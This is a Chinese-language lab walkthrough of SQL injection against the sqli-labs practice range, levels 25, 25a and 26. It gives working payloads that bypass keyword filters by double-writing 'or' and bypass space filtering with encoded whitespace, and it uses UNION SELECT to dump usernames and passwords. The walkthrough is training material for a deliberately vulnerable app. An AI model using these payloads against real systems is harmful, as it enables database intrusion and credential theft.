网络安全——过滤绕过注入

综合渗透测试-过滤绕过注入

第一步，打开网络拓扑，启动实验虚拟机，分别查看虚拟机IP地址：

Kali Linux

Windows 7

第二步，使用Kali Linux访问目标靶机sqli-labs靶场页面，第25关：

http://172.16.1.200/sqli-labs/Less-25

第三步，对第25关进行渗透测试：

1）测试基础SQL注入语句：

http://172.16.1.200/sqli-labs/Less-25/?id=1' #

2）使用井号注释失败，改为尝试“--+”进行测试：

http://172.16.1.200/sqli-labs/Less-25/?id=1' --+

显示用户名和密码：Dumb。

3）尝试爆出当前表的列数：

?id=1' order by 5 --+

通过返回结果，我们猜测“order”变成了“der”，是由于后台过滤了“or”，替换为了空值。

4）由于“or”被WAF过滤，我们将“or”改为"oorr"尝试，这样WAF在过滤一个“or”之后，还剩余一个“or”，我们将该方法成为“双写”：

?id=1' oorrder by 5 --+

成功，但显示第5列不存在。

5）查询是否存在第四列：

?id=1' oorrder by 4--+

第四列不存在。

6）查询是否存在第三列

第三列存在，证明当前表中有三个字段。

7）先测试字段的相对显示位置：

?id=1' union select 1,2,3 --+

我们的联合注入没有生效，仍然显示了ID为1的用户的信息。

8）将id修改为一个不存在的id，重新尝试注入：

?id=-1' union select 1,2,3 --+

注入成功，第2和第3字段分别是用户名和密码。

9）获取当前使用的数据库名：

?id=-1' union select 1,2,database() --+

得到当前使用的数据库名：security

10）从users表中分别读取username（用户名），password（密码）的值：

id=-1' union select 1,2,group_concat(username,0x7e,passwoorrd) from users --+

这里需要注意的是，“password”中包括“or”，需要双写为“passwoorrd”。

成功得到用户名和密码。

第四步，访问sqli-labs的第25a关卡：

http://172.16.1.200/sqli-labs/Less-25a

第五步，对第25a关卡进行注入测试：

1）首先测试是否可以通过ID读取用户信息：

http://172.16.1.200/sqli-labs/Less-25a/?id=1

可以读取用户信息。

2）尝试爆出字段相对位置：

?id=-1' union select 1,2,3#

未显示结果。

3）查看25a关卡的源代码（位于C:\AppServ\www\sqli-labs\Less-25a\index.php）：

第35行，SQL语句中并未存在单引号，证明这是一个数字型注入。

4）尝试去掉单引号进行联合查询注入：

?id=-1 union select 1,2,3#

注入成功。

5）获取当前使用的数据库名：

?id=-1 union select 1,2,database() #

得到当前的数据库名：security。

6）从users表中分别读取username（用户名），password（密码）的值：

id=-1 union select 1,2,group_concat(username,0x7e,passwoorrd) from users #

成功得到用户名和密码。

第六步，访问sqli-labs的第26关卡：

http://172.16.1.200/sqli-labs/Less-26

第七步，对第26关卡进行注入测试：

1）先测试ID是否显示正常：

http://172.16.1.200/sqli-labs/Less-26/?id=1

2）查看第26关卡源代码（位于C:\AppServ\www\sqli-labs\Less-26\index.php）：

通过审计源代码发现，第57行的blacklist方法将常见的SQL语句全部过滤为空。

从上面的过滤机制我们可以发现对“or”、“and”、“/*”、“#”、“--”“/”等特殊符号都进行了过滤，此处对于and和or的绕过方法就不再多说了，这里我们讲述几种技巧：

绕空格：

%09	TAB键（水平）
%0a	新建一行
%0c	新的一页
%0d	return功能
%0b	TAB键（垂直）
%a0	空格

3）获取当前数据库：

?id=0'%a0union%a0select%a02,database(),4%a0||%a0'1'='1

4）获得用户名和密码：

?id=0%27%a0union%a0select%a02,(select%a0group_concat(concat_ws(%27-%27,id,username,passwoorrd))%a0from%a0users),4%a0||%a0%271%27=%271